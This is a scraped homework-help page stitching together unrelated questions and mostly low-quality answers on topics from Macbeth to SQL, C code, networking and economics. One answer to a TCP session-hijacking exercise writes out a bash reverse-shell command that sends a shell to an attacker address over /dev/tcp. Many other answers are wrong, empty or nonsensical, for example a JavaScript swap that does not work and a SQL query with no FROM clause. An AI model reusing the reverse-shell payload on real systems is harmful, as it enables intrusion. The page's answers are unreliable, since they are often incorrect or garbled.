writer an obituary about macbeth​

Answers

Answer 1

Answer:

hi

Explanation:


Related Questions

Specify the correct order of steps necessary to use RDMA over converged Ethernet in Windows Server 2016.

Answers

Answer and Explanation:

RDM has two modes as physical and virtual and depends on the virtualization such as Physical RDM and Virtual DRM Physical RDM expose the SCSI device with the VM and get virtualized as SCSI command go direct the OS. VM takes the lower-level features of the SCSI device. Physical RDM has the following scenarios as Run the management agents Cost-effective to physical clustering Virtual RDM underlying the physical properties and appear as same as Disk file on VMFS volume. The device appears as virtualization and reads and writes the raw LUN. RDM includes the OS file locking and user-friendly names. RDMs with the attacked device and redundant of the independent disk. RDM uses a serial number to identify the SCSI device. SAN has compatibility mode and manages the storage and mirroring operations. Virtualization is a tool that can minimize administrative overhead while increasing scalability and cost. RDM provides the benefits which should be used in every situation. Virtual disk files are preferable to RDMs and provide a user-friendly name for the mapped device.

First Step :

Introduction to deployment guide

Step 2:

Test Basic Connectivity

Step 3 :

Configure VLAN

Step 4:

Configure DCB

Step 5:

RDMA cooenctivity

Step 6

Switch creation and testing

Step 7

Enabling SR IOV for guest RDMA

Q : Write a simple code, which basically takes a integer value from PC terminal and calculates the solutions on Arduino board and replays the answers to the PC terminal.


a. Power of given value.


b. If number is prime number or not.


you should upload your answers with *.c file with necessary comments.

Answers

Answer:

I have uploaded my answers with *.c file with necessary comments.

Explanation:

a. Power of given value.

A

#include <stdio.h>

int main() {

int base, exp;

long long result = 1;

printf("Enter a base number: ");

scanf("%d", &base);

printf("Enter an exponent: ");

scanf("%d", &exp);

while (exp != 0) {

result *= base;

--exp;

}

printf("Answer = %lld", result);

return 0;

}

b. If number is prime number or not.

#include <stdio.h>

int main() {

int n, i, flag = 0;

printf("Enter a positive integer: ");

scanf("%d", &n);

for (i = 2; i <= n / 2; ++i) {

// condition for non-prime

if (n % i == 0) {

flag = 1;

break;

}

}

if (n == 1) {

printf("1 is neither prime nor composite.");

}

else {

if (flag == 0)

printf("%d is a prime number.", n);

else

printf("%d is not a prime number.", n);

}

return 0;

}

Hope this helps!!!

Construct a SQL query that displays a list of colleges, their sity/state, the accrediting agency, and whether or not the school is distance only. Only show the first 10 records.

Answers

Answer:

SELECT college, city_state, accre_agency, distance LIMIT 10

Explanation:

Given

Table name: College

See attachment for table

Required

Retrieve top 10 college, state, agency and school distance from the table

To retrieve from a table, we make use of the SELECT query

The select statement is then followed by the columns to be selected (separated by comma (,))

So, we have:

SELECT college, city_state, accre_agency, distance

From the question, we are to select only first 10 records.

This is achieved using the LIMIT clause

i.e. LIMIT 10 for first 10

So, the complete query is:

SELECT college, city_state, accre_agency, distance LIMIT 10

Which of these actions will help build relationships with customers : A. Empowering employees to provide the best service possible B. Make follow- up calls after service transactions C. Ask for customer opinions on possible improvements D. all of the above

Answers

Answer: D. all of the above

Explanation:

Customers want to be provided with good service when they shop so it is important that employees are able to do so and they can only do so if they have the tools required. The company should therefore make those tools available thereby empowering employees to provide great service.

Making follow-up calls to customers after they receive a service to check if the service is working out will build customer relations because they will feel that the company cares. Finally, asking customers of their opinions on improvements needed makes them feel they have a voice and will go a long way in establishing rapport with them.

Implement in a programming language of your choice the void function swap( a, b ) that exchanges the values of 2 passed actual int parameters a and b. State which language you select. Actual parameters a and b are 2 distinct addressable programming objects (variables).

Answers

Answer:

Javascript.

function swap(a, b) {

a = b;

b = a;

// can you explain more, aka for what to return

}

Explanation:

The moment that S-locks are released will determine:__________

a. The granularity of locks
b. The compliance with ACID
c. The look-ahead logging strategy
d. The anomalies that can happen

Answers

Answer:

A.

Explanation:

In computer science, the selection of a lockable device is an essential consideration in the creation of a database management system.

Granularity locking is a locking technique that is applied in database management systems (DBMS) as well as relational databases. The granularity of locks corresponds to how much data is locked at once, and it is determined when S lock (Shared Locks) are released.

The moment that S-locks are released will determine the granularity of locks (Option a).

A lock can be defined as a procedure capable of enforcing limits on access to a particular resource when there exist many threads of execution.

Multiple granularity locking (abbreviated as MGL) is a locking strategy employed in database management systems and also in relational databases.

This strategy (multiple granularity locking) is often used in order to ensure serializability.

In conclusion, the moment that S-locks are released will determine the granularity of locks (Option a).

Learn more in:

https://brainly.com/question/15691389

A digital computer has a memory unit with 16 bits per word. The instruction set consists of 72 different operations. All instructions have an operation code part(opcode) and an address part(allowing for only one address). Each instruction is stored in one word of memory.

Required:
a. How many bits are needed for the opcode?
b. How many bits are left for the address part of the instruction?
c. What is the maximum allowable size for memory?
d. What is the largest unsigned binary number that can be accommodated in one word of memory?

Answers

Answer:

a. 7 bits b. 9 bits c. 1 kB d. 2¹⁶ - 1

Explanation:

a. How many bits are needed for the opcode?

Since there are 72 different operations, we require the number of bits that would contain 72 different operations. So, 2ⁿ ≥ 72

72 = 64 + 8 = 2⁶ + 8

Since n must be an integer value, the closest value of n that would contain 72 different operations is n = 7. So, 2⁷ = 128

So, we require 7 bits for the opcode.

b. How many bits are left for the address part of the instruction?

bits left = bits per word - opcode bit = 16 - 7 = 9 bits

c. What is the maximum allowable size for memory?

Since there are going to be 2⁹ bits to addresses each word and 16 bits  for each word, the maximum allowable size for memory is thus 2⁹ × 16 = 512 × 16 = 8192 bits.

We convert this to bytes

8192 bits × 1 byte/8 bits = 1024 bytes = 1 kB

d. What is the largest unsigned binary number that can be accommodated in one word of memory?

Since the number go from 0 to 2¹⁶, the largest unsigned binary number that can be accommodated in one word of memory is thus

2¹⁶ - 1

Adobe Indesign project 4 museum indesign file. The instructions are 70 pages long I cant sit still long enough to read them

Answers

Answer:

? Read on to learn about the possible reasons and resolutions. ... Check whether you have the latest update installed for InDesign. ... InDesign cannot open the file when your system does not have enough memory ... Copy page elements into a new document.

Explanation:

d. Chipboard
4. Which component of a computer connects the processor to the other hardw
a. Motherboard
b. CPU
c. Punch card
d. Chip
5. Which is referred to the brain of computer?
a. Processor
b. RAM
c. ROM
d Hard drive
6. How many parts are consists in a computer for information processing cycle?
a. Only one part
b. Two parts
Three parts
d Four parts
7. Which among the following if absent, a computer is not complete?
a. Mouse
b. DVD
c. Projector
d. User
8
GET AT​

Answers

Answer:

7

Explanation:

Newton's method has the advantage of having a faster quadratic convergence rate over the other methods such as Secant and bisection methods.

a. True
b. False

Answers

Answer:

a. True

Explanation:

The Newton's method (Newton-Raphson method) used in advanced statistical computing can be used for a continuous and differentiable function that can be approximated by a straight line tangent to it. It requires the derivative of the function to be known, Newton's method converges faster that is whenever it converges. Newton Raphson Method has quadratic convergence which is faster, and the quadratic convergence makes the error in the next iteration increase by the square of the value of the previous iteration.

There is an active Telnet connection from a client (10.0.2.5) to a Telnet server(10.0.2.9). The server has just acknowledged a sequence number1000, and the client has just acknowledged a sequence number 3000. An attacker wants to launch the TCP session hijacking attack on the connection, so he can execute a command on the server. He is on the same local area network as these two computers. You need to construct a TCP packet for the attacker. Please fill in the following fields:
• Source IP and Destination IP
• Source port and Destination port
• Sequence number
• The TCP data field.

Answers

Answer:

Answer is mentioned below.

Explanation:

Source IP and Destination IP: 10.0.2.5, 10.0.2.9 Source port and Destination port: for source port, we need to sniffer a packet in this  Sequence number: 3001 The TCP data field: “/bin/bash –l > /dev/tcp/10.0.20/9090 2>&1 0<&1”

I hope you find the answer helpful. All the codes are correctly mentioned. Thanks

Another method that might be desired is one that updates the Goalie's jerseyNumber. This method will receive a new number of Jersey and set this number to the Goalie's current jerseyNumber. What methods would accomplish this?

Answers

Answer:

A setter method

Explanation:

A setter method will accomplish this. A setter method is a method that takes in a value as an argument and grabs an object's instance variable and modifies it with the value passed as an argument. In this scenario, the argument value would be the current JerseyNumber. The setter method will grab the object's jerseyNumber variable and change its value to be the value of the passed argument. Setter methods are common practice in all object classes as well as the getter methods to retrieve instance variables.

Unemployment rate is a macroeconomic measure that describes:
O A. the percentage of people who are looking for a job but cannot find
one.
B. the value of the goods produced in a country divided by its
population.
c. the total value of goods and services a country produces in a year.
D. the increase in prices of consumer goods over a period of time.



Someone help me ASAP pleaseeee

Answers

Answer:

c

Explanation:

Using a loop and indexed addressing, write code that rotates the members of a 32-bit integer array forward one position. The value at the end of the array must wrap around to the ?rst position. For example, the array [10,20,30,40] would be transformed into [40,10,20,30].

Answers

Answer:

//begin class definition

public class Rotator{

    //main method to execute the program

    public static void main(String []args){

       

       //create and initialize an array with hypothetical values

       int [] arr =  {10, 20, 30, 40};

       

       //create a new array that will hold the rotated values

       //it should have the same length as the original array

       int [] new_arr = new int[arr.length];

       

       

       //loop through the original array up until the

       //penultimate value which is given by 'arr.length - 1'

      for(int i = 0; i < arr.length - 1; i++ ){

           //at each cycle, put the element of the

           //original array into the new array

           //one index higher than its index in the

           //original array.

          new_arr[i + 1] = arr[i];

       }

       

       //Now put the last element of the original array

       //into the zeroth index of the new array

       new_arr[0] = arr[arr.length - 1];

       

       

       //print out the new array in a nice format

      System.out.print("[ ");

       for(int j = 0; j < new_arr.length;  j++){

           System.out.print(new_arr[j] + " ");

       }

       System.out.print("]");

       

    }

   

   

}

Sample Output:

[ 40 10 20 30 ]

Explanation:

The code above is written in Java. It contains comments explaining important parts of the code.  A sample output has also been provided.

i don’t know what subject to put this question in but does anyone know the difference between a quarter grade and "fin" grade on skyward bc my current quarter grade is very different from my grade on fin and i don’t know what it means

Answers

What's skyward? Explain plz and i'll update the answer.

Holding all else constant a higher price for ski lift tickets would be expected to

Answers

Answer:

answer is below

Explanation:

decrease the number of skis sold

I wish we could visit Paris for the holidays into exclamatory​

Answers

Answer:

wdym

Explanation:

You want to visit Paris ? Tbh is sould fun and interesting

Identify the logic error in the code below. The code is supposed to display a single message “child”, “adult” or “senior” for any value of age:

if (age < 18) {
System.out.println("child");
} else if (age >= 18) {
System.out.println("adult");
} else if (age > 65) {
System.out.println("senior");
}
Question 1 options:

a)

no message for age = 65

b)

too many messages for age = 18

c)

no message for age < 65

d)

message “senior” will never be displayed

Answers

If we take a look at the first else if block, the code runs whenever the age is greater than or equal to 18. This means that senior will never be displayed. Answer choice D is correct.

Whatever programming language you use will ultimately need to be translated into binary in order for the computer to understand it.

a. True
b. False

Answers

Answer:

Javascript:

function translate(what) {

if (what) {

return 1;

} else if (!what) {

return 0;

}

}

translate(true);

Explanation:

True is 1;

False is 0;

You work part time at a computer repair store. You just upgraded the processor in a customer's computer. The computer starts, but it shuts down shortly after starting Windows. Because you know that the problem is related to the processor, you will check any issues related to the processor installation. In this lab, you task is to diagnose and correct the problem.

Answers

Answer:

Explanation:

If the computer is starting up and getting into windows then this means that the processor itself is not dead. First, check to see if the processor fan is spinning correctly when turning on the computer. If it is, then you will need to remove it, and make sure that the processor is perfectly slotted within the cpu slot and that no pins are bent. If this is the case, then clean the cpu top with an alcohol swab and reapply thermal paste. If it is overheating due to any of these reasons it would cause the pc to power off in order to preserve the processor. If none of these fix the problem then it might be a faulty processor or a problem with another component such as the RAM or power cables.

Character positions in
arrays start counting with
the number 1.
True
False

Answers

Answer:

False.

Explanation:

A data dictionary can be defined as a centralized collection of information on a specific data such as attributes, names, fields and definitions that are being used in a computer database system.

In a data dictionary, data elements are combined into records, which are meaningful combinations of data elements that are included in data flows or retained in data stores.

This ultimately implies that, a data dictionary found in a computer database system typically contains the records about all the data elements (objects) such as data relationships with other elements, ownership, type, size, primary keys etc. This records are stored and communicated to other data when required or needed.

In Computer programming, an array can be defined as data structure which comprises of a fixed-size collection of variables each typically holding a piece of data and belonging to the same data type such as strings or integers.

This ultimately implies that, when a programmer wishes to store a group of related data (elements) of the same type, he or she should use an array.

Generally, character positions in arrays start counting with the number 0 not 1.

Hence, an array uses a zero-based indexing and as such the numbering or position of the characters (elements) starts from number 0. Thus, the first character (element) in an array occupies position zero (0), the second number one (1), the third number two (2) and so on.

Consider the following pseudocode.
i = 0
sum = 0
REPEAT UNTIL i = 4
i = 1
sum++
DISPLAY sum

What is the output?

Answers

Considering the pseudocode :

i = 0

sum = 0

REPEAT UNTIL i = 4

i = 1

sum++

DISPLAY sum

The output of the pseudocode will be 4.

pseudocode

pseudocode  is a plain language description of the steps in an algorithm or another system.

Let's write the code in python.

i = 0

sum = 0

while i < 4:

   sum += 1

   i += 1

print(sum)

Code explanation:The first line of code, we initialise i as zero.The sum was also initialise as zero.Then we use the while loop to loop through i until its less than 4.Then we add one to the sum for each loop.Then, increase the value of i to continue the loop.Finally, we print the sum.

learn more on pseudocode here : https://brainly.com/question/17101205

Write a function NumberOfPennies() that returns the total number of pennies given a number of dollars and (optionally) a number of pennies. Ex: 5 dollars and 6 pennies returns 506.
Sample program:
#include
using namespace std;

int main() {
cout << NumberOfPennies(5, 6) << endl; // Should print 506
cout << NumberOfPennies(4) << endl; // Should print 400
return 0;

Answers

Answer:

Following are the code to the given question:

#include <iostream>//header file  

using namespace std;

int NumberOfPennies(int ND, int NP=0)//defining a method that accepts two parameters  

{

return (ND*100 +NP);//use return keyword that fist multiply by 100 then add the value  

}

int main() //main method

{

cout << NumberOfPennies(5,6) << endl; // Should print 506

cout << NumberOfPennies(4) << endl; // Should print 400

return 0;

}

Output:

506

400

Explanation:

In the method "NumberOfPennies" it accepts two parameters that are "ND and NP" that uses the return keyword that multiply 100 in ND variable and add in NP variable and return its values.

In the main method it it uses the cout method that call the by accepts value in parameter and print its value.

Consider the following statements. An abstract class is better than an interface when the variables in the abstract class or interface are likely to have changing values. An interface is better than an abstract class when nearly all of the methods in the abstract class or interface are abstract. An abstract class is better than an interface if new methods are likely to be required in the abstract class or interface in the future. An abstract class is better than an interface if a sub class is likely to need to inherit more than one super class. Which of the choices below is correct?

a. I and Il are true
b. I and III are true
c. II and III are true
d. I, II, and III are true
e. I, III, and I are true

Answers

Well the nonchalant question given for 4th grade red named babyface Justin and Jerome

Write the difference between left-sentential form and
right-sentential form

Answers

Answer:

answer is below

Explanation:

A left-sentential form is a sentential form that occurs in the leftmost derivation of some sentence. A right-sentential form is a sentential form that occurs in the rightmost derivation of some sentence.

Your disaster recovery plan calls for tape backups stored at a different location. The location is a safe deposit box at the local bank. Because of this, the disaster recovery plan specifies that you choose a method that uses the fewest tapes, but also allows you to quickly back up and restore files. Which backup strategy would best meet the disaster recovery plan for tape backups?

Answers

☞ANSWER☜

Store Physical Backup Media Offsite. Like data stored in the cloud, offline data stored on physical media is susceptible to unauthorized access. Offsite media storage helps significantly reduce the possibility of theft and physical damage to your media assets from fires, floods and natural disasters.

An incremental backup is one in which successive copies of the data contain only the portion that has changed since the preceding backup copy was made. ... Incremental backups are often desirable as they reduce storage space usage, and are quicker to perform than differential backups.

The following Integer values are pushed onto a stack, s. The values are pushed onto s in the order that they appear below (left to right).

1 7 4 6 10 9

Assume the following declaration has been made.
PriorityQueue priQue new PriorityQueuecinteger> :

Values are popped off the stack, s, and as each value is popped off the stack, it is inserted into the priority queue, priQue. The following code is then executed.

while (!priQueue.isEmpty()){
System.out.println (priQue.remove ())

The numbers printed to the screen would be: ______

Answers

Answer:

9 10 6 4 7 1

Explanation:

When the values are pushed to the stack they would end up in the stack in the same order as they go in.

1 7 4 6 10 9

when elements are popped from a stack they are removed from the end to the beggining of the stack, and since these elements are being added to the priorityQueue then priQue will have the following order

9 10 6 4 7 1

this will also be the order that the numbers will be printed out from left to right since priorityQueue remove method, removes the elements from left to right.

8.
A bank offers the following rate of interest for fixed deposit:
Time (Years)
Rate (%)
9.0
1 to 2
10.0
2 to 3
11.0
> 3
12.0
The amount (A) after n years is calculated by using the formula :
A = P (1 + r/100)
Where P = Principal amount deposited, ,
R = Rate of interest,
n = Number of years
Write a program to accept deposited amount (P), number of years the amount is deposited for (n) and compute
the accrued amount for an investor.​

Answers

Answer:

Simple interest does not add any interest rate on the interest amount ... r = Rate of Interest ... principal amount with the rate of interest and the tenure of the loan or deposit. ... (P x r x t) ÷ (100 x 12) ... Example 1: If you invest Rs.50,000 in a fixed deposit account for a period of 1 year at ... (5,00,000 x 18 x 3) ÷ 100 = Rs.2,70,000.

Explanation:

16238)
Which type of device often controls iot
tasks?
Desktop
Laptop
Samart phone
switch

Answers

Answer:

Consumer connected devices include smart TVs, smart speakers, toys, wearables and smart appliances. Smart meters, commercial security systems and smart city technologies -- such as those used to monitor traffic and weather conditions -- are examples of industrial and enterprise IoT devices.

Multiply the following two Tom's Tiny floating-point format numbers (8-bit: sign bit, 3-bit 2's complement exponent, 4-bit fraction). Make sure to correctly round the result before putting the answer back in the 8-bit format.

A = 10010011
B = 10101000
AxB = _______

Answers

Answer:

A*B =  00111100

Explanation:

Given data :

A = 10010011

B = 10101000

Find A * B

For A = 10010011  express in sign bit , exponent and number

repeat same process for B

attached below is a detailed solution

A*B =  00111100

Other Questions
1 What did Japan hope would result from its attack on Pearl Harbor?A America would no longer be able to resist Japanese expansionB Germany and Italy would declare war on the United States.C Japan would be able to seize America's important fuel supplies.D The United States would sign on to the Tripartite Pact. More rights are given to the people is to the 9 thAmendment As rights given to the states is to the _______________ As a host, you are the first impression of our restaurant that our guests see and your job is to start off their visit with a smile!According to this sentence from the document, hosts/hostesses shouldA)assist customers in making future reservations.B)quickly list the daily specials offered at Peytons Grill.C)say a pleasant goodbye to guests as they leave the restaurant.D)greet guests in a friendly manner as they arrive at the restaurant. After solving the system x+2y=10 and x-2y=2. What is the sum of x+y equal to? The picture shows a wall of a small room. Can someone help me figure this out please? A 7th-grade class has 9 boys and 11 girls. Two representatives are to be chosen at random by their teacher. What is the probability that that BOTH representatives will be girls? Give your answer as a fraction is simplest form. In entrepreneurship, what does the potential for profit offset?A. the labor of businessB. the risk of innovationC. the stress of organizationD. the investment of research Why did most Southern slaveholders resist abolition efforts to freeenslaved people? pls help with my LAST QUESTION f(x) = x2. What is g(x)?Fast answer I will mark brainlyest Sara drove 96 miles on 3.2 gallons of gas. How many miles can Sara drive on 12.5 gallons of gas Write the ratio of corresponding sides for the similar triangles and reduce the ratio to lowest terms.ETIH12515a.1245155b.454151215C.45112103d.1555m4--124 Read the statement below and choose whether the situation described is dealing with criminal law or civil law:Mrs. Mann owns a beauty shop and has a deal with a local soap distributor to supply her with soaps and lotions. She ordered and paid for several thousand dollars of soap. However, on the date of the first delivery, the soap distributor did not show up. Mrs. Mann has been unable to make contact with the distributor. She consults a lawyer to see about recouping the money she has lost. civil law criminal law What is a credit card? In November, 26 students at Monarch High School had contracted the flu. Each month, the number of students who have contracted the flu increases by 36%. Write and use an exponential growth function to find the total number of students who have contracted the flu by May. in when you reach me who teaches miranda about time travel Rohit is drawing a picture. (Into passive voice)Arjun said to me, "Are you my bestfriend?" (into indirect speech) Use the Pythagorean Theorem to find the missing length and then round theresult to the nearest tenth.b = 2, c = 3a = Which blood type can be given to ANY individual needing a blood transfusion?AB-O-O+A+